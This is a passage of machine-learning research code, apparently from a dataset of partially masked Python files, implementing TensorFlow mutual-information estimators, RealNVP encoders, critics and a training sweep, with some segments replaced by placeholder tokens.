nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n 
return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, 
scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return 
self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
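The rows above ablate a TensorFlow script that trains contrastive mutual-information estimators (InfoNCE, JS f-GAN, and several smoothed PCC variants) on RealNVP-encoded image halves. As a minimal, self-contained sketch of the InfoNCE bound those rows define (TensorFlow 2.x assumed; the random score matrix below is only a stand-in for a real critic output):

# Hedged sketch: InfoNCE lower bound as quoted in the dataset rows above.
import tensorflow as tf

def infonce_lower_bound(scores):
    # scores[i, j]: critic value for pairing sample i of view 1 with sample j of view 2;
    # the diagonal holds the positive (jointly drawn) pairs.
    nll = tf.reduce_mean(tf.linalg.diag_part(scores) - tf.reduce_logsumexp(scores, axis=1))
    return tf.math.log(tf.cast(tf.shape(scores)[0], tf.float32)) + nll

scores = tf.random.normal((64, 64))  # placeholder critic matrix, not real data
print(float(infonce_lower_bound(scores)))

The estimate can never exceed log(batch_size), a known limitation of InfoNCE, which is why the script evaluates representations with a classifier as well as with the raw bound.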
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() 
for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, 